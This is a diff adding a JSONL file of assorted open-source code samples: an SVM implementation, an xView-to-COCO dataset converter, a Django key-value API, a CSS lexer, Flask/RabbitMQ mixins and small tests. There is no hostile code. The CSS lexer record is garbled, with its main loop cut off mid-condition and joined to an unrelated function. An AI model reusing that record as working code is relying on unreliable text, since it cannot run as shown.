diff --git "a/2397.jsonl" "b/2397.jsonl" new file mode 100644--- /dev/null +++ "b/2397.jsonl" @@ -0,0 +1,707 @@ +{"seq_id":"166179705","text":"# <>\n# Copyright 2022, Lawrence Livermore National Security, LLC.\n# See the top-level COPYRIGHT file for details.\n# \n# SPDX-License-Identifier: BSD-3-Clause\n# <>\n\nimport sys\nsys.path.insert( 0, '../../' )\n\nfrom pqu.PQU import floatToShortestString\n\nvalue = 100\nfor trimZeros in [ 0, 1 ] :\n for keepPeriod in [ 0, 1 ] :\n for favorEFormBy in [ -5, 5 ] :\n for significantDigits in range( 3 ) :\n a = floatToShortestString( value, significantDigits, trimZeros, keepPeriod, favorEFormBy )\n print(trimZeros, keepPeriod, \"%2s\" % favorEFormBy, significantDigits, \"<%s>\" % a)\nprint(floatToShortestString( 1.234e-9, 12 ))\n","sub_path":"pqu/Check/t14.py","file_name":"t14.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"566811698","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\nfrom scipy.spatial.distance import pdist, squareform, cdist\nfrom scipy.optimize import minimize\nimport time\n\n\nclass KernalSVM(object):\n def __init__(self, C, kernel='linear', sigma=.1, random_state=123, verbose=True):\n self.C = C\n self.kernel = kernel\n self.sigma = sigma\n self.random_state = random_state\n self.verbose = verbose\n \n def _L(a, x, y):\n return np.sum(a) - 0.5 * np.sum((a[:, None]*a[None, :])*(y[:, None]*y[None, :])*(x[:, None]*x[None, :]))\n \n \n def fit(self, X, y):\n \n # Add column of ones\n #X = np.hstack((X, np.ones((X.shape[0], 1))))\n \n # get dimensions of X\n n, d = X.shape\n \n # construct gram matrix\n if self.kernel == 'linear':\n G = self.__linear_kernel(X, X)\n elif self.kernel == 'gaussian':\n G = self.__gaussian_kernel(X, X, self.sigma)\n \n #define function to minize\n #f = lambda a: -np.sum(a) + 0.5 * np.sum((a[:, None]*a[None, :])*(y[:, None]*y[None, :])*(X @ X.T))\n f = lambda a: -np.sum(a) + 0.5 * np.sum((a[:, None]*a[None, :])*(y[:, None]*y[None, :])*G)\n jac = lambda a: np.dot(a, (y[:, None]*y[None, :])*G) - np.ones(a.shape[0])\n #initial guess\n np.random.seed(self.random_state)\n a0 = np.random.rand(X.shape[0])\n \n cons = ({'type': 'eq', 'fun': lambda a: np.dot(a,y), 'jac': lambda a: y}, \n #{'type': 'ineq', 'fun': lambda a: a}, {'type': 'ineq', 'fun': lambda a: self.C - a}\n )\n bnds = [(0, self.C)]*X.shape[0]\n \n res = minimize(f, a0, method='SLSQP', jac=jac, constraints=cons, bounds=bnds, options={'disp': self.verbose})\n \n self.alphas_ = res.x\n if self.kernel == 'linear':\n self.w_ = np.sum(self.alphas_*y*X.T, axis=1)[:, np.newaxis]\n self.bl_ = np.mean(y - np.dot(self.w_.T, X.T))\n self.b_ = np.mean(y - np.sum((self.alphas_*y)[:, np.newaxis]*G, axis=0))\n self.X_ = X.copy() # used in predicting\n self.y_ = y.copy()\n \n return self\n \n def predict(self, X):\n \n if self.kernel == 'linear':\n K = self.__linear_kernel(self.X_, X)\n elif self.kernel == 'gaussian':\n K = self.__gaussian_kernel(self.X_, X, self.sigma)\n \n return np.sign(np.sum((self.alphas_*self.y_)[:, np.newaxis]*K, axis=0) + self.b_)\n \n #return np.sign(np.dot(self.w_.T, X.T) + self.b_)\n \n def __gaussian_kernel(self, x, z, sigma):\n \n #K = np.exp(-(np.linalg.norm(x-z, 2)**2)/sigma)\n K = np.exp(-(cdist(x, z, 'euclidean')**2)/sigma)\n #print('K: ', K)\n return K\n \n def __linear_kernel(self, x, z):\n \n K = np.dot(x, z.T)\n \n return K\n\t\t\n\n\ndef cost(y_true, y_pred):\n n = len(y_true)\n return 
np.sum(y_true != y_pred)/n\t\n\t\n\t\n\t\n\t\nif __name__ == \"__main__\":\n\n\tprint('-'*50)\n\tprint('Loading Data ...', end='')\n\ttrain_dsn = pd.read_csv(r\"../bank-note/train.csv\", \n\t\t\t\t\t\t\theader=None, \n\t\t\t\t\t\t\tnames=['variance', 'skewness', 'curtosis', 'entropy', 'label'])\n\ttest_dsn = pd.read_csv(f\"../bank-note/test.csv\", \n\t\t\t\t\t\t header=None,\n\t\t\t\t\t\t names=['variance', 'skewness', 'curtosis', 'entropy', 'label'])\n\t\t\t\t\t\t \n\ttrain_dsn['label'] = train_dsn.apply(lambda x: -1 if x['label'] == 0 else 1, axis=1)\n\ttest_dsn['label'] = test_dsn.apply(lambda x: -1 if x['label'] == 0 else 1, axis=1)\n\t\n\tX_train = train_dsn[[x for x in train_dsn.columns if x not in ['label']]].values\n\ty_train = train_dsn['label'].values\n\tX_test = test_dsn[[x for x in test_dsn.columns if x not in ['label']]].values\n\ty_test = test_dsn['label'].values\n\t\n\tprint('completed.')\n\tprint()\n\t\n\tprint('-'*50)\n\tprint('Running dual SVM...')\n\t\n\tprint('KERNEL: LINEAR')\n\tC = [100/873, 500/873, 700/873]\n\tfor c in C:\n\t\tprint('-'*50)\n\t\tprint('C: ', c)\n\t\tstart_time = time.time()\n\t\tres = KernalSVM(C=c, kernel='linear', verbose=True, random_state=1138).fit(X_train, y_train)\n\t\tprint('weights: ', res.w_.T, 'intercept: ', res.b_)\n\t\tpred_train = res.predict(X_train)\n\t\tpred_test = res.predict(X_test)\n\t\tprint('training error: ', cost(y_train, pred_train))\n\t\tprint('testing error: ', cost(y_test, pred_test))\n\t\tend_time = time.time()\n\t\tprint('Running Time: ', end_time - start_time)\n\t\t\n\tprint('KERNEL: GAUSSIAN')\n\tC = [100/873, 500/873, 700/873]\n\tsigma = [0.01, 0.1, 0.5, 1, 2, 5, 10, 100]\n\talpha_list = []\n\tfor c in C:\n\t\tfor s in sigma:\n\t\t\tprint('-'*50)\n\t\t\tprint('C: ', c, 'Sigma: ', s)\n\t\t\tstart_time = time.time()\n\t\t\tres = KernalSVM(C=c, kernel='gaussian', sigma=s).fit(X_train, y_train)\n\t\t\t#print('weights: ', res.w_, 'intercept: ', res.b_)\n\t\t\talpha_list.append(res.alphas_)\n\t\t\tpred_train = res.predict(X_train)\n\t\t\tpred_test = res.predict(X_test)\n\t\t\tprint('training error: ', cost(y_train, pred_train))\n\t\t\tprint('testing error: ', cost(y_test, pred_test))\n\t\t\tend_time = time.time()\n\t\t\tprint('Running Time: ', end_time - start_time)\n\t\t\t\n\tprint()\n\tprint('Number of support vectors: ')\n\tfor i in range(len(alpha_list)):\n\t\tprint(np.sum(alpha_list[i] > 0))\n\t\t\t\n\tprint()\n\tprint('For 500/873, number of shared support vectors:')\n\tfor i in range(8, 15):\n\t\tprint('C={}, gamma={}-{}: {}, {}'.format(500/873, sigma[i-8], sigma[i-8+1], np.sum(alpha_list[i] > 0), np.sum(alpha_list[i+1] > 0)))\n\t\tprint(np.sum(np.bitwise_and((alpha_list[i] > 0),(alpha_list[i+1] > 0))))\n","sub_path":"src/SVM/kernel_svm.py","file_name":"kernel_svm.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"190246778","text":"import re\nimport datetime\ndef clean_data(data,timestamp):\n\tif timestamp==False:\n\t\tdata=data.encode('utf-8')\n\t\tdata=data.strip()\n\t\tdata=data.replace('\\n', ' ').replace('\\r', '')\n\t\tdata=re.sub('[^A-Za-z0-9 ]+', '', data)\n\t\tif data==None or not data.strip():\n\t\t\tdata=\"Nothing\"\n\telse:\n\t\tdata=data.split(\".\")\n\t\tdata.remove(data[-1])\n\t\tdata=datetime.datetime.strptime(\" \".join(data),'%Y-%m-%d %H:%M:%S')\n\treturn 
data\n","sub_path":"dependencies/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"590711000","text":"# MatthewInkawhich\n\n'''\nThis script is a utility to convert the original xView dataset to COCO format.\n'''\nimport aug_util as aug\nimport wv_util as wv\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nimport glob\nimport argparse\nimport os\nimport json\nimport skimage.io \n \n\nclass xView_JSON_Dict():\n def __init__(self, class_names_LUT):\n # Initialize ID runners\n self.img_id = 0\n self.ann_id = 0\n # Initialize head\n self.head = {}\n # Add info branch\n self.head[\"info\"] = {\n \"description\": \"xView Dataset for 2018 Challenge\",\n \"url\": \"http://xviewdataset.org\",\n \"version\": \"1.0\",\n \"year\": 2018,\n \"contributor\": \"DIUx\",\n \"date_created\": \"2018/01/01\"\n }\n # Add licenses branch\n self.head[\"licenses\"] = [{\n \"url\": \"http://xviewdataset.org\",\n \"id\": 1,\n \"name\": \"xView License\"\n }]\n # Initialize images branch\n self.head[\"images\"] = []\n # Initialize annotations branch\n self.head[\"annotations\"] = []\n # Add categories branch\n self.head[\"categories\"] = []\n for key, value in class_names_LUT.items():\n self.head[\"categories\"].append({\n \"supercategory\": \"object\",\n \"id\": key,\n \"name\": value\n })\n\n\n # Add an image AND its corresponding annotations to the dict\n def add_image(self, file_name, width, height, boxes, int_classes):\n # Add entry to images branch\n self.head[\"images\"].append({\n \"id\": self.img_id,\n \"width\": width,\n \"height\": height,\n \"file_name\": file_name,\n \"license\": 1,\n \"flickr_url\": \"N/A\",\n \"coco_url\": \"N/A\",\n \"date_captured\": \"2018/01/01\"\n })\n\n # Add entries to annotations branch\n for i in range(len(int_classes)):\n self.head[\"annotations\"].append({\n \"id\": self.ann_id,\n \"image_id\": self.img_id,\n \"category_id\": int_classes[i],\n \"segmentation\": [],\n \"area\": boxes[i][2] * boxes[i][3], # Area is box w * h\n \"iscrowd\": 0,\n \"bbox\": boxes[i]\n })\n # Increment annotation id\n self.ann_id += 1\n\n # Increment image id\n self.img_id += 1\n\n # Write the dict structure to file\n def write_file(self, out_path, indent=None):\n with open(out_path, 'w') as outfile:\n json.dump(self.head, outfile, indent=indent)\n\n\n# Define a function for translating full labels to simple labels\ndef convert_full_to_simple(full_boxes, full_classes):\n full_to_simple_translator = {\n (11,12,13): 1,\n (17,18,19): 2,\n (71,72,73,74,76,77): 3,\n (20,21,23,24,25,27,28,29): 4,\n (33,34,35,36,37,38): 5,\n (40,41,42,44,45,47,49,50,51,52): 6,\n (53,54,55,56,57,59,60,61,62,63,64,65,66,32): 7\n }\n simple_boxes = []\n simple_classes = []\n for j in range(len(full_classes)):\n for k, v in full_to_simple_translator.items():\n if full_classes[j] in k:\n simple_boxes.append(full_boxes[j])\n simple_classes.append(v)\n break\n return simple_boxes, simple_classes\n\n\n\n# Define how to clip a value\ndef clip(old, minimum, maximum):\n if old < minimum:\n return minimum\n elif old > maximum:\n return maximum\n return old\n \n\n######### Inputs\nTRAIN = True\nCHIP_SIZE = 600\nOLD_ROOT = \"../xView\"\nNEW_ROOT = \"../xView-coco-{}\".format(CHIP_SIZE)\nCHIP_SHAPE = (CHIP_SIZE, CHIP_SIZE)\nBOX_AREA_THRESH = 20\nOVERLAP = 0.20\n#########\n\n# Set image path and ff_list path based on TRAIN\nIMG_PATH = NEW_ROOT+\"/train_images/\" if TRAIN else 
NEW_ROOT+\"/val_images/\"\nANNOTATION_PATH_FULL = NEW_ROOT+\"/annotations/train_full.json\" if TRAIN else NEW_ROOT+\"/annotations/val_full.json\"\nANNOTATION_PATH_SIMPLE = NEW_ROOT+\"/annotations/train_simple.json\" if TRAIN else NEW_ROOT+\"/annotations/val_simple.json\"\nFF_LIST_PATH = NEW_ROOT+\"/meta/ff_train.txt\" if TRAIN else NEW_ROOT+\"/meta/ff_val.txt\"\nDEGREES = [0, 10, 90, 180, 270] if TRAIN else [0]\n\n# Create the Class # -> Class Label Dictionary\nclass_names_LUT_full = {}\nwith open('xview_class_labels.txt') as f:\n for row in csv.reader(f):\n class_names_LUT_full[int(row[0].split(\":\")[0])] = row[0].split(\":\")[1]\n\n# Create the Class # -> Class Label Dictionary\nclass_names_LUT_simple = {}\nwith open('xview_class_labels_simple.txt') as f:\n for row in csv.reader(f):\n class_names_LUT_simple[int(row[0].split(\":\")[0])] = row[0].split(\":\")[1]\n\n\n# Load all of the labels from .geojson\nall_coords, all_chips, all_classes = wv.get_labels(OLD_ROOT + \"/xView_train.geojson\")\n\nprint(\"Full Dataset Stats:\")\nprint(all_coords.shape)\nprint(all_chips.shape)\nprint(all_classes.shape)\n\n\n# Create directories if they don't exist\nif not os.path.isdir(NEW_ROOT+\"/annotations\"):\n os.makedirs(NEW_ROOT+\"/annotations\")\nif not os.path.isdir(IMG_PATH):\n os.makedirs(IMG_PATH)\n\n# Get all of the unique .tif names from all_chips\n#tif_names = np.unique(all_chips)\n\n\ntif_names = [line.rstrip('\\n') for line in open(FF_LIST_PATH)]\n\nprint(\"tif_names:\", tif_names)\n\n\n# Initialize JSON_Dict object\njson_dict_full = xView_JSON_Dict(class_names_LUT_full)\njson_dict_simple = xView_JSON_Dict(class_names_LUT_simple)\n\n\n# For each unique .tif\nfor tif_idx, unique_tif in enumerate(tif_names):\n\n print(\"Working on: [{} / {}] {} \".format(tif_idx+1, len(tif_names), unique_tif))\n\n # Make sure the file exists\n if not os.path.isfile(OLD_ROOT+\"/train_images/\"+unique_tif):\n continue\n\n # Get the info relevant to this single full frame .tif\n ff_coords = all_coords[all_chips==unique_tif]\n ff_classes = all_classes[all_chips==unique_tif].astype(np.int64)\n print(\"\\tTotal Num Targets: \",len(ff_classes))\n\n # Chip the image into smaller pieces\n arr = wv.get_image(OLD_ROOT+\"/train_images/\"+unique_tif) \n #c_img, c_box, c_cls = wv.chip_image(img=arr, coords=ff_coords, classes=ff_classes, shape=CHIP_SHAPE)\n c_img, c_box, c_cls, _ = wv.chip_image_overlap(img=arr, coords=ff_coords, classes=ff_classes, shape=CHIP_SHAPE, overlap=OVERLAP)\n num_chips = len(c_img)\n print(\"\\tNum Chips: \",num_chips)\n\n # For each image chip (i in range(num_chips))\n for i in range(num_chips): \n\n print(\"\\t\\tChip #: \",i)\n\n # Calculate the center of the chip\n center = (int(c_img[i].shape[0]/2),int(c_img[i].shape[1]/2))\n\n # For each of the desired rotation degrees\n for deg in DEGREES:\n\n # Rotate the original chip and get the updated image/boxes/classes \n tmp_img,tmp_box,tmp_cls = aug.rotate_image_and_boxes(c_img[i], deg, center, c_box[i], c_cls[i])\n\n # Git rid of very small boxes that are artifacts of chipping\n final_boxes = []\n final_classes = []\n final_classes_simple = []\n\n # Clip boxes correctly!!\n clipped_boxes = []\n for box in tmp_box:\n xMin,yMin,xMax,yMax = box\n xMin = clip(xMin, 0, CHIP_SHAPE[0]-1)\n yMin = clip(yMin, 0, CHIP_SHAPE[1]-1)\n xMax = clip(xMax, 0, CHIP_SHAPE[0]-1)\n yMax = clip(yMax, 0, CHIP_SHAPE[1]-1)\n clipped_boxes.append([xMin, yMin, xMax, yMax])\n \n\n # Eliminate clipped boxes whose area is too small\n for j,box in enumerate(clipped_boxes):\n 
xMin,yMin,xMax,yMax = box\n box_area = (xMax-xMin)*(yMax-yMin)\n box_width = xMax - xMin + 1\n box_height = yMax - yMin + 1\n if box_area > BOX_AREA_THRESH:\n # Excludes odd error cases\n if tmp_cls[j] in class_names_LUT_full.keys(): \n # COCO expects boxes in [top-left x, top-left y, w, h] format\n final_boxes.append([int(xMin), int(yMin), int(box_width), int(box_height)])\n final_classes.append(int(tmp_cls[j]))\n \n # Create simple class annotations\n final_boxes_simple, final_classes_simple = convert_full_to_simple(final_boxes, final_classes)\n\n \n # Construct the saved chip name\n chip_name = \"img_{}_{}_rot{}.jpg\".format(unique_tif.split(\".\")[0], i, deg)\n\n # TIME TO WRITE**\n # First, check that the files do not already exist before writing\n #if os.path.exists(NEW_ROOT+\"/annotations/\"+xml_name) and os.path.exists(NEW_ROOT+\"/JPEGImages/\"+chip_name):\n # continue\n \n # Convert the integer class labels to english labels\n #final_english_classes = [class_names_LUT_full[lbl] for lbl in final_classes]\n assert(len(final_boxes) == len(final_classes))\n\n # Add to annotation dictionary\n json_dict_full.add_image(chip_name, CHIP_SHAPE[1], CHIP_SHAPE[0], final_boxes, final_classes)\n json_dict_simple.add_image(chip_name, CHIP_SHAPE[1], CHIP_SHAPE[0], final_boxes, final_classes_simple)\n\n # Save the chipped image to disk\n #skimage.io.imsave(IMG_PATH+chip_name, tmp_img) #, quality=100) \n\n# The last step is to write the final JSON_Dict to json file\njson_dict_full.write_file(ANNOTATION_PATH_FULL, indent=None) \njson_dict_simple.write_file(ANNOTATION_PATH_SIMPLE, indent=None) \n","sub_path":"create_xView_coco_dataset.py","file_name":"create_xView_coco_dataset.py","file_ext":"py","file_size_in_byte":9607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"215359592","text":"from django.shortcuts import render\nfrom key_value.models import Store\nfrom django.http import HttpResponse,JsonResponse\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom datetime import datetime,timedelta\nfrom django.core import serializers\n\n# Create your views here.\n@csrf_exempt\ndef values(request):\n \n if request.method == \"GET\":\n\n Store.objects.filter(created_at__lte = (datetime.now() - timedelta(minutes = 5))).delete()\n # return key values\n keys = request.GET.get('keys', None)\n if keys is None:\n # return all value\n data = {}\n store = Store.objects.all()\n for row in store:\n data[row.key] = row.value\n \n return JsonResponse(data)\n else:\n store = Store.objects.all()\n allKeys = keys.split(',')\n data = {}\n for row in store:\n if(row.key in allKeys):\n temp_store = Store.objects.filter(key = row.key).get()\n temp_store.created_at = datetime.now()\n temp_store.save()\n data[row.key] = temp_store.value\n return JsonResponse(data)\n\n if request.method == \"POST\":\n #save data\n data = json.loads(request.body)\n for k in data:\n store = Store(key=k, value=data[k],created_at = datetime.now())\n store.save()\n return JsonResponse({})\n \n if request.method == \"PATCH\":\n # edits data\n store = Store.objects.all()\n data = json.loads(request.body)\n for row in store:\n if(row.key in data.keys()):\n temp_store = Store.objects.filter(key = row.key).get()\n temp_store.created_at = datetime.now()\n temp_store.value = data[row.key]\n temp_store.save()\n return 
JsonResponse({})","sub_path":"key_value/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"579117836","text":"import re\nfrom Rutas import Rutas\nfrom ReporteErrores import ReporteErrores\nsignos=['%','#','\\*', '\\-' , '\\{', '\\}', '\\;', '\\,', '\\.', '\\:','\\(','\\)']\nlinea = 0\ncolumna = 0\ncontador = 0\nRecuperacion=\"\"\n\nErrores = []\nBitacora=[] #[Lexema,Estado, Token, Aceptacion]\npalabrasReservadas = ['mm','pt','pc','cm','in','vw','vh','em','px','position','bottom','color','display','top','float','Opacity', 'width','right','clear','height','left','text-align','border', 'border-style','font-weight', 'font-style','font-family','font-size','padding-left','padding-bottom','padding-top','padding-right','line-height','min-width','min-height','margin','margin-right','margin-bottom','margin-top','margin-left','max-height','max-width','background-image','background','background-image', ]#text-align \n\n\nclass AnalizadorL_CSS(ReporteErrores,Rutas):\n\n \n def funcMainCSS(self, Entrada):\n global contador, Errores, Recuperacion, Bitacora\n Salida=\"\"\n clase = AnalizadorL_CSS() \n contador=0\n Errores=[]\n Bitacora=[]\n tokens = clase.Analizador(Entrada+\"#\")\n PalabrasReservadas(tokens)\n for token in tokens:\n print(token)\n #Salida+=listToString(token)+\"\\n\"\n print(\"---------ERRORES:--------\")\n Salida+=\"---------------BITÁCORA:--------------\"+\"\\n\"\n Salida+=\"\\n[Lexema, Estado, Token, Aceptación]\\n\"\n if(len(Errores)!=0):\n clase.GenerarReporte(Errores,\"Reporte Analizador de CSS\")\n for err in Errores:\n print (err)\n #Salida+=listToString(err)+\"\\n\"\n if(len(tokens)!=0 and len(Recuperacion)!=0):\n clase.CrearRuta(tokens, Recuperacion,\"css\")\n Recuperacion=\"\"\n if(len(Bitacora)!=0):\n for tok in Bitacora:\n Salida+=printBitacora(tok)+\"\\n\"\n \n return Salida\n #END\n\n def Analizador(self, Entrada):\n global linea, columna, contador, Errores, Recuperacion,Bitacora\n linea = 1\n columna = 1\n listaTokens = []\n\n while contador < len(Entrada)-1:\n if Entrada[contador]==\"/\": #COMENTARIOS\n aux=\"\"\n if Entrada[contador+1]==\"*\" and (contador+1)\"\n counter+=1\n elif (counter==1):\n stri+=str(token[counter])+\"--> \"\n counter+=1\n elif (counter==2):\n stri+=str(token[counter])+\"--> \"\n counter+=1\n elif (counter==3):\n stri+=str(token[counter])+\"] \"\n counter+=1 \n\n return stri\n#END\n\n\n\n\nEntradaTexto= open('entrada.olc1')\ncontenido = EntradaTexto.read()\n\n\n\nif __name__ == \"__main__\":\n clase = AnalizadorL_CSS()\n clase.funcMainCSS(contenido)","sub_path":"Proyecto1_Compi1/AL/AnalizadorL_CSS.py","file_name":"AnalizadorL_CSS.py","file_ext":"py","file_size_in_byte":12592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"262034804","text":"from typing import Any, Dict\nfrom weakref import ref\n\nfrom flask import Blueprint\nfrom kombu import Connection\nfrom rethinkdb.ast import Table\n\nfrom pysite.constants import (\n BOT_EVENT_QUEUE, BotEventTypes,\n RMQ_HOST, RMQ_PASSWORD, RMQ_PORT, RMQ_USERNAME\n)\nfrom pysite.database import RethinkDB\nfrom pysite.oauth import OAuthBackend\n\n\nBOT_EVENT_REQUIRED_PARAMS = {\n \"mod_log\": (\"level\", \"title\", \"message\"),\n \"send_message\": (\"target\", \"message\"),\n \"send_embed\": (\"target\",),\n \"add_role\": (\"target\", \"role_id\", \"reason\"),\n \"remove_role\": (\"target\", \"role_id\", 
\"reason\")\n}\n\n\nclass DBMixin:\n \"\"\"\n Mixin for classes that make use of RethinkDB. It can automatically create a table with the specified primary\n key using the attributes set at class-level.\n\n This class is intended to be mixed in alongside one of the other view classes. For example:\n\n >>> class MyView(APIView, DBMixin):\n ... name = \"my_view\" # Flask internal name for this route\n ... path = \"/my_view\" # Actual URL path to reach this route\n ... table_name = \"my_table\" # Name of the table to create\n ... table_primary_key = \"username\" # Primary key to set for this table\n\n This class will also work with Websockets:\n\n >>> class MyWebsocket(WS, DBMixin):\n ... name = \"my_websocket\"\n ... path = \"/my_websocket\"\n ... table_name = \"my_table\"\n ... table_primary_key = \"username\"\n\n You may omit `table_primary_key` and it will be defaulted to RethinkDB's default column - \"id\".\n \"\"\"\n\n table_name = \"\" # type: str\n table_primary_key = \"id\" # type: str\n\n @classmethod\n def setup(cls: \"DBMixin\", manager: \"pysite.route_manager.RouteManager\", blueprint: Blueprint):\n \"\"\"\n Set up the view by creating the table specified by the class attributes - this will also deal with multiple\n inheritance by calling `super().setup()` as appropriate.\n\n :param manager: Instance of the current RouteManager (used to get a handle for the database object)\n :param blueprint: Current Flask blueprint\n \"\"\"\n\n if hasattr(super(), \"setup\"):\n super().setup(manager, blueprint) # pragma: no cover\n\n cls._db = ref(manager.db)\n\n @property\n def table(self) -> Table:\n return self.db.query(self.table_name)\n\n @property\n def db(self) -> RethinkDB:\n return self._db()\n\n\nclass RMQMixin:\n \"\"\"\n Mixin for classes that make use of RabbitMQ. It allows routes to send JSON-encoded messages to specific RabbitMQ\n queues.\n\n This class is intended to be mixed in alongside one of the other view classes. For example:\n\n >>> class MyView(APIView, RMQMixin):\n ... name = \"my_view\" # Flask internal name for this route\n ... path = \"/my_view\" # Actual URL path to reach this route\n ... queue_name = \"my_queue\" # Name of the RabbitMQ queue to send on\n\n Note that the queue name is optional if all you want to do is send bot events.\n\n This class will also work with Websockets:\n\n >>> class MyWebsocket(WS, RMQMixin):\n ... name = \"my_websocket\"\n ... path = \"/my_websocket\"\n ... queue_name = \"my_queue\"\n \"\"\"\n\n queue_name = \"\"\n\n @classmethod\n def setup(cls: \"RMQMixin\", manager: \"pysite.route_manager.RouteManager\", blueprint: Blueprint):\n \"\"\"\n Set up the view by calling `super().setup()` as appropriate.\n\n :param manager: Instance of the current RouteManager (used to get a handle for the database object)\n :param blueprint: Current Flask blueprint\n \"\"\"\n\n if hasattr(super(), \"setup\"):\n super().setup(manager, blueprint) # pragma: no cover\n\n @property\n def rmq_connection(self) -> Connection:\n \"\"\"\n Get a Kombu AMQP connection object - use this in a context manager so that it gets closed after you're done\n\n If you're just trying to send a message, check out `rmq_send` and `rmq_bot_event` instead.\n \"\"\"\n\n return Connection(hostname=RMQ_HOST, userid=RMQ_USERNAME, password=RMQ_PASSWORD, port=RMQ_PORT)\n\n def rmq_send(self, data: Dict[str, Any], routing_key: str = None):\n \"\"\"\n Send some data to the RabbitMQ queue\n\n >>> self.rmq_send({\n ... \"text\": \"My hovercraft is full of eels!\",\n ... 
\"source\": \"Dirty Hungarian Phrasebook\"\n ... })\n ...\n\n This will be delivered to the queue immediately.\n \"\"\"\n\n if routing_key is None:\n routing_key = self.queue_name\n\n with self.rmq_connection as c:\n producer = c.Producer()\n producer.publish(data, routing_key=routing_key)\n\n def rmq_bot_event(self, event_type: BotEventTypes, data: Dict[str, Any]):\n \"\"\"\n Send an event to the queue responsible for delivering events to the bot\n\n >>> self.rmq_bot_event(BotEventTypes.send_message, {\n ... \"channel\": CHANNEL_MOD_LOG,\n ... \"message\": \"This is a plain-text message for @everyone, from the site!\"\n ... })\n ...\n\n This will be delivered to the bot and actioned immediately, or when the bot comes online if it isn't already\n connected.\n \"\"\"\n\n if not isinstance(event_type, BotEventTypes):\n raise ValueError(\"`event_type` must be a member of the the `pysite.constants.BotEventTypes` enum\")\n\n event_type = event_type.value\n required_params = BOT_EVENT_REQUIRED_PARAMS[event_type]\n\n for param in required_params:\n if param not in data:\n raise KeyError(f\"Event is missing required parameter: {param}\")\n\n return self.rmq_send(\n {\"event\": event_type, \"data\": data},\n routing_key=BOT_EVENT_QUEUE,\n )\n\n\nclass OAuthMixin:\n \"\"\"\n Mixin for the classes that need access to a logged in user's information. This class should be used\n to grant route's access to user information, such as name, email, id, ect.\n\n There will almost never be a need for someone to inherit this, as BaseView does that for you.\n\n This class will add 3 properties to your route:\n\n * logged_in (bool): True if user is registered with the site, False else wise.\n\n * user_data (dict): A dict that looks like this:\n\n {\n \"user_id\": Their discord ID,\n \"username\": Their discord username (without discriminator),\n \"discriminator\": Their discord discriminator,\n \"email\": Their email, in which is connected to discord\n }\n\n user_data returns None, if the user isn't logged in.\n\n * oauth (OAuthBackend): The instance of pysite.oauth.OAuthBackend, connected to the RouteManager.\n \"\"\"\n\n @classmethod\n def setup(cls: \"OAuthMixin\", manager: \"pysite.route_manager.RouteManager\", blueprint: Blueprint):\n if hasattr(super(), \"setup\"):\n super().setup(manager, blueprint) # pragma: no cover\n\n cls._oauth = ref(manager.oauth_backend)\n\n @property\n def logged_in(self) -> bool:\n return self.user_data is not None\n\n @property\n def user_data(self) -> dict:\n return self.oauth.user_data()\n\n @property\n def oauth(self) -> OAuthBackend:\n return self._oauth()\n","sub_path":"pysite/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":7250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"426291825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport unittest\n\n\nclass DivZeroTestCase(unittest.TestCase):\n\n def test_should_raise_exception(self):\n with self.assertRaises(ZeroDivisionError):\n 1 / 0\n # 2 / 3\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_exception.py","file_name":"test_exception.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"554361020","text":"#!/usr/bin/env python\n# \n# An alternative Python code to print u v w from the input uvtable\n# if the uv table has only one channel and one stokes, then we also output re im wt amp\n# \n\nimport os, sys, 
re\nimport numpy as np\nimport astropy\nfrom astropy.table import Table\nfrom astropy.io import fits\nimport astropy.constants as const\nfrom copy import copy\nimport shutil\nimport itertools\nfrom collections import OrderedDict\n\n# \n# read user input\nuvt_names = []\nout_name = ''\nkeep_zeros = False\niarg = 1\narg_mode = ''\nwhile iarg < len(sys.argv):\n arg_str = sys.argv[iarg].lower().replace('--','-')\n if arg_str == '-name':\n arg_mode = 'name'\n iarg += 1\n continue\n elif arg_str == '-out':\n arg_mode = 'out'\n iarg += 1\n continue\n elif arg_str == '-keep-zeros' or arg_str == '-keepzeros':\n arg_mode = ''\n keep_zeros = True\n iarg += 1\n continue\n elif arg_str == '-keep-files' or arg_str == '-keepfiles':\n arg_mode = ''\n iarg += 1\n continue\n # \n if arg_mode == 'name':\n if not os.path.isfile(sys.argv[iarg]):\n print('Error! The input file \"%s\" does not exist!'%(sys.argv[iarg]))\n sys.exit()\n uvt_names.append(sys.argv[iarg])\n elif arg_mode == 'out':\n out_name = sys.argv[iarg]\n # \n iarg += 1\n\n\n# \n# print usage\nif len(uvt_names) == 0 or out_name == '':\n print('')\n print('Usage: ')\n print(' pdbi-uvt-raw-uvtable-print-u-v-w.py -name uvtable_spw1_example.uvt -out output_u_v_w_re_im_wt_table.txt')\n print('')\n print('Notes:')\n print(' -- This code allows to input *.uvt or *.uvfits, but uvfits must be generated in CASA data structure type.')\n print(' In the case of inputting a *.uvt, we will call GILDAS MAPPING FITS command to convert it to *.uvfits.')\n print(' -- The output file is a table with 4 or 7 columns: ')\n print(' If the input data has more than one channel or stokes, then we output 4 columns: ivis, u, v, w.')\n print(' Else if the input data has only one channel and one stokes, then we output 7 columns: ivis, u, v, w, re, im, wt, amp.')\n print(' The output format can be either *.txt or *.csv or *.fits.')\n print(' -- Data rows where re, im, wt are all zeros will not be output, this can happen for some edge channels,')\n print(' and thus the output table might not have a uniform block size. To keep those zero rows, use the -keep-zeros 